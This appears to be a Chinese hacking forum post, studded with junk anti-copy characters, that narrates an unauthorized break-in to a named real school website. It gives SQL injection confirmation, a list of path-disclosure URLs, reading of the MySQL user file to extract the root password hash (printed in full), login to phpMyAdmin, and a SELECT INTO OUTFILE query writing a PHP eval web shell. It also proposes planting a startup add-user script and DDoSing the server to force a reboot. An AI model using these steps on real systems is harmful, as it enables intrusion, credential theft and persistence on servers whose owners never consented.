第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏* X; G9 M7 T9 y* Y% X1 [% h/ `. L
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!: Z- Z, T$ U; v
5 p% ]7 E2 s8 Y) j; k
6 [& l% T- T/ i+ Z9 i0 j7 O8 w- ~% V1 N' {( r
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 9 c& j# @: ~; H
3 `$ g3 D# k6 ^
那么想可以直接写入shell ,getshell有几个条件:* S% m+ L7 _# A4 I6 B
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF 8 F+ I! i" g. ]; w! a
/ \3 @% C2 r3 b- S) L3 R& @- Y( i5 b试着爆绝对路径: + G z- y- {) U* h4 _; a' Y
1./phpMyAdmin/index.php?lang[]=1
/ l$ X0 \( R3 o2./phpMyAdmin/phpinfo.php
8 Q5 X. e' V0 d0 A3./load_file() 3 g& P1 q" s( P. ^& E3 w6 `0 q" m
4./phpmyadmin/themes/darkblue_orange/layout.inc.php
6 C& w6 O$ W3 J8 N+ F5 }: g/ J: e( q5./phpmyadmin/libraries/select_lang.lib.php % a+ j2 g; M5 b9 c1 U3 M# U+ P) ^6 C
6./phpmyadmin/libraries/lect_lang.lib.php * u3 z! H! U1 d
7./phpmyadmin/libraries/mcrypt.lib.php 2 o! q y6 E0 f( w3 p
8./phpmyadmin/libraries/export/xls.php x# P+ y/ ~8 S% w9 _
$ h# t5 Y# a4 U' Q% N. @1 V, W7 {
均不行........................... 0 _: o% O/ Y/ F/ j5 O
3 S( k9 ? M. W. p' @6 K
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
: |2 b6 ^/ A2 ^5 h2 ?. d
7 Y# [' E4 x, T. y4 v# H1 @权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin . _! [3 K+ t5 {: Z5 G
# c* `9 t6 f& Q u+ i( I
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
& c& W0 n9 v1 v# J" ^/ B5 X
8 c$ o# q- v# X1 }6 ]1 X: L敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
2 W. Z* W5 b8 y$ p" e# Z0 V9 s* b( B# C9 i5 o
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell , \4 w/ D: F) V2 u: Z4 U
5 w R, K2 Q x+ E
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini 4 \9 K$ L) b$ F! U0 Z( r
2 n+ F3 P4 j6 Z/ Y
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD 6 V p1 S' b6 C& l+ c
5 I) _6 c( d3 B' Y成功读到root密码: ) n' b) Q& J: X) M
/ h4 W& f, ^9 }4 w17---- r(0072)
7 ~) H7 O; O9 g% _& V18---- o(006f) $ x# i4 M+ i) R1 y
19---- o(006f) 5 h7 W! r, L( Y" A
20---- t(0074) . b$ [. s& f, `2 r% n, U) w
21---- *(002a) & W: p2 s) u, q# ]: z
22---- 8(0038)
b2 ]: H5 _2 \9 \. d Q23---- 2(0032) / e* S4 {% F7 d3 h
24---- E(0045) 4 Y8 P t9 @! L D( ^# @* n# |
25---- 1(0031) " m8 c& B4 e+ e# r0 q. A
26---- C(0043) * {& Z- @0 f# d$ V* W8 B9 y
27---- 5(0035) # j2 N2 k5 ?6 U8 r1 j
28---- 8(0038)
8 I% i& X& }' x2 u- D8 x# F29---- 2(0032)
5 V6 ^, |" E( e8 y. ?' j$ [# A ~30---- 8(0038) p/ w* _9 }) F$ l2 J% N0 s( V
31---- A(0041) 8 V2 S& O, w/ i" K- N0 }
32---- 9(0039) 4 z' f- W2 y! | U# h! f) \7 Y
33---- B(0042)
4 q1 E# i( @% |6 E, {34---- 5(0035)
& t4 c0 _; q. _+ S2 v4 D35---- 4(0034)
: i/ q6 v: ^2 B8 J. [" A: n36---- 8(0038) % B$ f/ }( S' t8 ]. x
37---- 6(0036) 8 W) d9 w5 |8 o/ W+ v+ Z0 H# ^ e
38---- 4(0034)
; X6 b, G. @$ L3 `# k/ J+ s39---- 9(0039) ) v& n. {. M `, n
40---- 1(0031) 7 f. E5 k6 u: ^
41---- 1(0031)
?' | H$ l, f i42---- 5(0035)
1 W0 t* v& e9 ~" D& C8 Y43---- 3(0033)
7 h$ a2 R! T, C2 }* r/ b$ O44---- 5(0035) - [' J/ B9 X8 u+ U
45---- 9(0039)
a" A0 N' M4 k3 _: q! p46---- 8(0038)
5 y6 n6 P& C0 W4 {47---- F(0046)
2 L R6 ^# e0 S, v) b+ t$ n48---- F(0046)
# V+ N9 z) s j9 n4 q% U49---- 4(0034)
+ w! l0 c7 B# I0 F1 F; Q( s- _50---- F(0046)
/ u) m3 m) J* x, C# c; b51---- 0(0030)
6 F( y. o+ H! Q( O52---- 3(0033) ) d' Q/ [4 H* b( J
53---- 2(0032) 0 s& q' M$ L% G& ?
54---- A(0041) ! C. X% Q) ?( w, V* V: v. g9 f- w! f# G
55---- 4(0034) 0 b6 K: D, t& p; R F' `3 U
56---- A(0041)
5 {& ^3 P [7 y! E5 n' i: ^0 w" M! q57---- B(0042) 7 z4 U% K. k: V$ s0 f/ u
58---- *(0044)
. X; F) H4 J! b) }9 u9 S: M9 s59---- *(0035)
; z3 I7 I7 f: m3 D g, D60---- *(0041) , O! R+ ?$ ^ h
61---- *0032)
9 h# a! Z/ E7 o- q* U q2 [! h1 s6 ^/ g# Z
解密后成功登陆phpmyamin
' z r$ |. I( ~- i % h1 Q4 O* U a2 A+ A
4 y3 r) [" V% t8 }3 v" R, Z0 D
0 y2 t# `, i6 f7 Y8 @& X0 }: r+ D3 Y9 Y( ]) r
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
/ f v8 u; e( t- `. e, k' ?) P. R+ J, S& K! O9 ]3 m! H2 [
成功执行,拿下shell,菜刀连接:
1 Z3 N5 | l% ~% J7 Q0 k
( }0 l+ o% } t( m- O, u服务器不支持asp,aspx,php提权无果...................
: \9 U6 y% a& a( n/ y6 x$ g) D0 p5 w4 H9 W
& f( m' x: ^0 l; {( ]. L7 e$ {5 ~- `但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
5 X( G7 L/ s- S9 R: O5 h1 n- P服务器上已经有个隐藏帐号了
! ?* ~- E3 ]2 a9 M6 d别名 administrators+ v4 [0 x* s M) c" b
注释 管理员对计算机/域有不受限制的完全访问权
7 Q6 v7 a6 D% B- A+ l$ j$ I成员
2 [6 ~9 u6 _- P-------------------------------------------------------------------------------
% h# g9 f/ J* _' fadmin1 }1 Q( H ~# {
Administrator
1 J' w1 t( l8 i7 Xslipper$8 e2 R0 F- t1 y! X( z# \$ d
sqluser
5 t+ B: g0 g- v) ]5 B6 f! l命令成功完成。 , f# O; v7 ~9 t, O5 s$ ^* v# a
) x: N% N! \1 B
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
9 f" R2 N) W' x6 r" M$ R% C
7 Z' ^! Y B9 |ddos服务器重启,不然就只能坐等服务器重启了...............................
, Y. E6 b. \8 u" T/ q+ s( b* G: u4 o% i% u k. f2 f
; t1 y# R5 I1 |1 b9 G/ [& K; I, i1 P |